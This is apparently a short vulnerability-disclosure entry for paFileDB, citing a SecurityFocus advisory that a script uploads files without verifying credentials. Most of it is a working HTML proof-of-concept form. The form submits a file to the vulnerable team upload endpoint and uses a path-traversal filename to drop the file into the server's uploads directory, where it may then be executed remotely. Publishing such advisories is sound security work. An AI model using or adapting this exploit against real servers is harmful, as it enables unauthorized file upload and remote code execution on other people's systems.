source: https://www.securityfocus.com/bid/8271/info It has been reported that a script contained in paFileDB does not properly verify user credentials before accepting files for upload. As a result, remote attackers may be able to upload files to the Web server. After a file has been uploaded, it may be possible for the attacker to execute the file remotely. <html><body> <form ENCTYPE="multipart/form-data" method="POST" action="http://srv/pafiledb/includes/team/file.php"> <input name="userfile" TYPE="file"><br> <input name="userfile_name" TYPE="text" value="../../../uploads/makeawish"><br> <input type="hidden" name="action" value="team"> <input type="hidden" name="tm" value="file"> <input type="hidden" name="file" value="upload"> <input type="hidden" name="upload" value="do"> <input type=submit name=submit value="doit"> </form> </body></html>